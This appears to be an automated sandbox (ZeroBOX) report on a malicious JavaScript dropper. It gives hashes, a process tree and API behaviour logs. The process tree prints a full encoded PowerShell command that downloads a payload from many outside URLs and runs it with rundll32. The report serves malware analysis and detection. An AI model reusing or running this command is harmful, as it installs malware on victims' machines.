Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 25, 2023, 10:43 a.m.	May 25, 2023, 10:45 a.m.

Size	293.7KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`c33d868374d8dc29858a094689ce231c`
SHA256	`2ccf8c9d10aa440de433fd08c5e8b3eb56fb36fda70d1b0d55a7b05b842aa22c`
CRC32	`2FCBADB5`
ssdeep	`3072:GOIw9mWrZ/giY6AYYxmXzgYDJL4fECfZ01B1jjp:fmCZ/vSmXzrtIECfZsjjjp`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\envenomation.js
3036
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\Heteromorphic.js" blateroonPursership WhoosisInterall scatbacksNanoinstruction
  1604
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABFAGwAdQBhAHQAZQBkAEEAcABsAGUAYwB0AHIAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABFAEEAZABRAEIAcABBAEgATQBBAGEAUQBCAG4AQQBHADQAQQBZAFEAQgBzAEEAQwA0AEEAWgBRAEIAdQBBAEcAYwBBAGEAUQBCAHUAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAUwBjAGEAcgBjAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGUAUQBCAGgAQQBHADQAQQBiAHcAQgB3AEEASABNAEEAYQBRAEIAaABBAEYAQQBBAGMAZwBCAGgAQQBHAFUAQQBjAHcAQgBwAEEARwBRAEEAYQBRAEIAaABBAEMANABBAFoAQQBCAHAAQQBIAEkAQQBaAFEAQgBqAEEASABRAEEAYgB3AEIAeQBBAEgAawBBAFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEAYwBnAEIAcABBAEcAVQBBAEwAZwBCADAAQQBHAGcAQQBaAFEAQgBoAEEASABRAEEAWgBRAEIAeQBBAEEAPQA9AFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEcAVQBBAGMAZwBCAGgAQQBIAFUAQQBiAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFUAQQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBVAEEAYwB3AEEAdQBBAEcATQBBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEAQQA9AD0AUgBzAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADMAQQBDADQAQQBOAFEAQQAwAEEAQwA0AEEATgBBAEEANABBAEEAPQA9ACIAOwAkAFIAZQBtAGkAZwByAGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAQQBBAEwAZwBBAHgAQQBEAFEAQQBOAEEAQQB2AEEASABvAEEAYgB3AEIAMABBAEQAZwBBAE0AZwBBAHYAQQBFAFEAQQBVAEEAQgBGAEEARwBjAEEAWQBnAEEAPQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB2AEEASABRAEEATAB3AEIAVQBBAEYAWQBBAGMAdwBCAEIAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBFAGMAQQBXAGcAQQAwAEEARgBJAEEAUwBRAEIARwBBAEYAbwBBAFEAZwBCAHUAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHYAQQBEAFEAQQBlAEEAQgBJAEEARwA4AEEAYwBRAEIAcwBBAEcAMABBAFcAQQBCAFYAQQBHAGsAQQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBFAE0AQQBNAGcAQgBwAEEARwBJAEEAYQBRAEIAUwBBAEgATQBBAFEAdwBCAHkAQQBFADgAQQBXAEEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAcgBpAG0AbwBsAGUAYwB1AGwAYQByAEMAZQByAGEAdABvAGQAaQBkAGEAZQAgAGkAbgAgACQAUgBlAG0AaQBnAHIAYQB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAFQAcABlAE4AIgApACAAewB0AHIAeQAgAHsAJABEAGUAbABpAHEAdQBpAHUAbQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAVQBBAGIAQQBCAHAAQQBIAEEAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAaABBAEcAVQBBAFMAQQBCAHAAQQBHAHcAQQBiAEEAQgB2AEEARwBFAEEAWgBRAEIAawBBAEMANABBAFoAQQBCAHIAQQBBAD0APQBrAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEgAWQBBAFoAUQBCAHkAQQBHAFUAQQBaAEEAQgBFAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGsAQQBHAFUAQQBaAEEAQgBzAEEASABrAEEATABnAEIAbQBBAEcAOABBAGMAZwBCAHoAQQBHAEUAQQBiAEEAQgBsAEEAQQA9AD0AIgA7ACQAUABvAHIAbwBwAG8AcgBvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBFAEEAYgBBAEIAbABBAEgATQBBAFkAUQBCADEAQQBIAEkAQQBkAFEAQgB6AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHkAQQBHAGsAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAaQBBAEcARQBBAGMAZwBCAG4AQQBHAEUAQQBhAFEAQgB1AEEASABNAEEAIgA7ACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVAByAGkAbQBvAGwAZQBjAHUAbABhAHIAQwBlAHIAYQB0AG8AZABpAGQAYQBlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwA7ACQAUwB0AHUAbgBuAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABNAEEAWQB3AEIAeQBBAEcAawBBAFkAZwBCAGgAQQBHADQAQQBiAHcAQgBWAEEARwA0AEEAYwB3AEIAaABBAEcATQBBAGMAZwBCAGwAQQBHAFEAQQBMAGcAQgB5AEEARwBFAEEAWQB3AEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYwBvAHIAawBpAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBjAEEAQgB3AEEARwA4AEEAYwB3AEIAcABBAEgAUQBBAGEAUQBCAHcAQQBHADgAQQBiAEEAQgBoAEEASABJAEEAUQB3AEIANQBBAEgAUQBBAGIAdwBCAHQAQQBHAGsAQQBZAHcAQgB5AEEARwA4AEEAYwB3AEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB2AEEARwBzAEEAYQBRAEIAdQBBAEcAYwBBAFcAUwA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgAwAEEARwBVAEEAYgBBAEIAbABBAEgATQBBAFkAdwBCAHYAQQBIAEEAQQBhAFEAQgBqAEEARgBVAEEAYgBnAEIAaABBAEgAQQBBAGMAQQBCAHMAQQBHAEUAQQBkAFEAQgBrAEEARwBVAEEAWgBBAEEAdQBBAEcATQBBAFkAUQBCAHoAQQBHAEUAQQBXAFMAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBaAEEAQgBsAEEASABJAEEAWgBRAEIANQBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBhAHcAQgBwAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGIAZwBBAD0AIgA7ACQAYgBhAHIAZwBoAGUAcwB0AHMAUwBhAHAAcgBvAGIAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE4AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABVAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAyADkAOAA0ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBVAEEAYgBnAEIAawBBAEcAVQBBAGMAZwBCADEAQQBIAFEAQQBhAFEAQgBzAEEARwBrAEEAZQBnAEIAbABBAEMANABBAFIAdwBCAHYAQQBIAFkAQQBaAFEAQgB5AEEARwA0AEEAYQBRAEIAdQBBAEcAYwBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgBpAGEAbgBuAHUAYQBsAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcARQBBAGIAQQBCAHMAQQBHAEUAQQBhAEEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEgAQQBBAGQAUQBCADAAQQBHAFUAQQBjAGcAQQA9AGQAWQBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAFUAQQBiAGcAQgBzAEEARwBFAEEAYwBnAEIAbgBBAEcAVQBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgBQAEEARwBNAEEAZABBAEIAdgBBAEcAUQBBAFkAUQBCAGoAQQBIAFEAQQBlAFEAQgBzAEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAPQBkAFkASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABFAEEATgBnAEEANQBBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAFEAQQAxAEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA="
    568

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 25, 2023, 10:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 25, 2023, 10:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:44 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 25, 2023, 10:44 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1120 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1120 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1120 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c1120 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 25, 2023, 10:44 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 135 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74312000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02710000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02790000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02682000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02791000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02792000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02683000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02684000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02685000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02686000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
